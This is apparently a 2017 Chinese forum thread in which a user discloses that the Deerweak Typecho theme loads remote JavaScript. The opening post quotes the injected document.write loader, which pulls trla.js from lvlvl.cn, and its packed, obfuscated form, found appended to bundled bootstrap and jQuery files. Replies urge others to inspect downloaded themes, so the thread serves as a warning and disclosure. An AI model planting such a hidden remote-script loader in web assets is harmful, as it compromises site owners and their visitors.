各位一定要小心主题挂马……不管你是哪里下载到的主题。

mymyhope

https://github.com/Deerweak/deerweak/issues/1
这个叫做Deerweak的typecho主题挺漂亮，于是我就下下来用了。
但是检查源代码时发现一件十分可疑的事情。浏览器执行了这么一段JS。

if(window.location.host!=="lvlvl.cn"){document.write("<\script type='text/javascript' src='//lvlvl.cn/usr/deerweak/js/trla.js'></script>")}
最终指向文件：https://krait.cn/usr/deerweak/js/trla.js

并且该资源为404，造成长时间等待。并且仔细查找后并没有在php文件中找到插入来源，细思恐极。于是深入检查，最后在"bootstrap.min.js"和“jquery-2.1.1.min.js"中的最后一行发现了被加密的插入指令。

原代码如下：

urn p}('4(8.5.f!=="1.2"){6.7("<\0 9='a/b' c='//1.2/d/e/3/g.3'\><\/0\>")}',17,17,'script|lvlvl|cn|js|if|location|document|write|window|type|text|javascript|src|usr|deerweak|host|trla'.split('|')

我很想知道作者用意何在，这样挂马是不是有点小可爱了……

mymyhope

不管你搞了啥主题插件，记得挡一眼代码看看有没有啥可疑的东西。再懒也要F12看看有没有奇怪的资源加载进去了。太可怕了。

admin .

说的很对，谢谢提醒

大猫

放到开源库里就有点意思了

vultrlinode

大猫 发表于 2017-6-4 17:40
放到开源库里就有点意思了

看来哪儿下载的东西都不能让人100%放心

mymyhope

vultrlinode 发表于 2017-6-4 17:45
看来哪儿下载的东西都不能让人100%放心

开源的东西你好歹还能自己看看代码，那些编译好的，有加密的 才害怕。

bigtiger8

有加密的   不敢用

小懒猪

是的 有的主题被修改的无可言喻

letxxt

这么说不敢随便下载了

tsk

萌新表示， nginx+html 路过……

主题跟我没关系了……